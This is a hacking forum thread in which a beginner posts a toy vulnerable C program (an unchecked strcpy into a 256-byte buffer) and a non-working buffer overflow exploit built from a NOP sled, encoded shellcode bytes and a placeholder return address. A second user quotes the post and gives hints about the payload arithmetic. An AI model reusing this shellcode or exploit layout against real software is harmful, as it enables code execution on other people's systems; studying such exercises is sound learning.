Buffer Overflow don't work

[Noktec]

Hi,
( first sorry for my bad english, be patient i'm a beginer, and tkx a lot for your help)

I have read a tutorial
and the vulnerable program was

Code:

#include
#include

int Aelphaeis();

int main(int argc, char **argv)
{
char buffer[256];
strcpy(buffer, argv[1]);
printf("%s", buffer);
return 0;
}

int Aelphaeis()
{
printf("ub3r secret c0de\n");
return 0;
}

so i saw that the buffer was 256 Char but when I created my little exploit
my computer give an overflow error @ 268 bytes

my shell code is 164 bytes

268 - 164 => 104 bytes ( or NOP )

i have written this exploit

Code:

#include
#include

int main()
{
int x=0;
unsigned char exploit[400]="vuln.exe ";
unsigned char nop[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
unsigned char scode[]="\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2a\x7a\x5f\x35\x83\xeb\xfc\xe2\xf4\xd6\x92\x1b\x35\x2a\x7a\xd4\x70\x16\xf1\x23\x30\x52\x7b\xb0\xbe\x65\x62\xd4\x6a\x0a\x7b\xb4\x7c\xa1\x4e\xd4\x34\xc4\x4b\x9f\xac\x86\xfe\x9f\x41\x2d\xbb\x95\x38\x2b\xb8\xb4\xc1\x11\x2e\x7b\x31\x5f\x9f\xd4\x6a\x0e\x7b\xb4\x53\xa1\x76\x14\xbe\x75\x66\x5e\xde\xa1\x66\xd4\x34\xc1\xf3\x03\x11\x2e\xb9\x6e\xf5\x4e\xf1\x1f\x05\xaf\xba\x27\x39\xa1\x3a\x53\xbe\x5a\x66\xf2\xbe\x42\x72\xb4\x3c\xa1\xfa\xef\x35\x2a\x7a\xd4\x5d\x16\x25\x6e\xc3\x4a\x2c\xd6\xcd\xa9\xba\x24\x65\x42\x8a\xd5\x31\x75\x12\xc7\xcb\xa0\x74\x08\xca\xcd\x19\x3e\x59\x49\x54\x3a\x4d\x4f\x7a\x5f\x35";
unsigned char retour[]="\x04\x03\x02\x01";
printf("etape 1");
strcat(exploit,nop);
printf("\netape 2");
strcat(exploit,scode);
printf("\netape 3");
strcat(exploit,retour);
printf("\netape 4\n");
x=strlen(exploit);
printf("etape 5\n");
printf("%d\n",x);
system(exploit);
printf("\nexploit ok\n");
system("PAUSE");
}

but it don't work

and i haven't the solution can you help me please

tks

[ShadowKill]

Hi,
( first sorry for my bad english, be patient i'm a beginer, and tkx a lot for your help)

I have read a tutorial
and the vulnerable program was

Code:

#include
#include
 
int Aelphaeis();
 
int main(int argc, char **argv)
{
char buffer[256];
strcpy(buffer, argv[1]);
printf("%s", buffer);
return 0;
}
 
int Aelphaeis()
{
printf("ub3r secret c0de\n");
return 0;
}

so i saw that the buffer was 256 Char but when I created my little exploit
my computer give an overflow error @ 268 bytes

my shell code is 164 bytes

268 - 164 => 104 bytes ( or NOP )

i have written this exploit

Code:

#include
#include
 
int main()
{
int x=0;
unsigned char exploit[400]="vuln.exe ";
unsigned char nop[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
unsigned char scode[]="\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2a\x7a\x5f\x35\x83\xeb\xfc\xe2\xf4\xd6\x92\x1b\x35\x2a\x7a\xd4\x70\x16\xf1\x23\x30\x52\x7b\xb0\xbe\x65\x62\xd4\x6a\x0a\x7b\xb4\x7c\xa1\x4e\xd4\x34\xc4\x4b\x9f\xac\x86\xfe\x9f\x41\x2d\xbb\x95\x38\x2b\xb8\xb4\xc1\x11\x2e\x7b\x31\x5f\x9f\xd4\x6a\x0e\x7b\xb4\x53\xa1\x76\x14\xbe\x75\x66\x5e\xde\xa1\x66\xd4\x34\xc1\xf3\x03\x11\x2e\xb9\x6e\xf5\x4e\xf1\x1f\x05\xaf\xba\x27\x39\xa1\x3a\x53\xbe\x5a\x66\xf2\xbe\x42\x72\xb4\x3c\xa1\xfa\xef\x35\x2a\x7a\xd4\x5d\x16\x25\x6e\xc3\x4a\x2c\xd6\xcd\xa9\xba\x24\x65\x42\x8a\xd5\x31\x75\x12\xc7\xcb\xa0\x74\x08\xca\xcd\x19\x3e\x59\x49\x54\x3a\x4d\x4f\x7a\x5f\x35";
unsigned char retour[]="\x04\x03\x02\x01";
printf("etape 1");
strcat(exploit,nop);
printf("\netape 2");
strcat(exploit,scode);
printf("\netape 3");
strcat(exploit,retour);
printf("\netape 4\n");
x=strlen(exploit);
printf("etape 5\n");
printf("%d\n",x);
system(exploit);
printf("\nexploit ok\n");
system("PAUSE");
}

but it don't work

and i haven't the solution can you help me please

tks

NOPs aren't used simply to fill the buffer space, they are used to "slide" the execution to a specific point in memory. Do some more research into how BoFs work, read Jon Erickson's Hacking: The Art Of Exploitation, and then you'll have a better grasp on what's going on......

[Noktec]

yes i know that but my exploit does not work

[ShadowKill]

yes i know that but my exploit does not work

And it doesn't work because you don't understand it and can't do simple math. I'd love to help you but you need to help yourself first....

Take a look at your numbers again. Look at your buffer, figure your return address according to buffer size - (NOP+shellcode), which brings up the question of why the hell is your shellcode so large, and go from there.

Like I said before, read up on BoFs, then compare what that information is telling you and what you did. You'll see where you went wrong....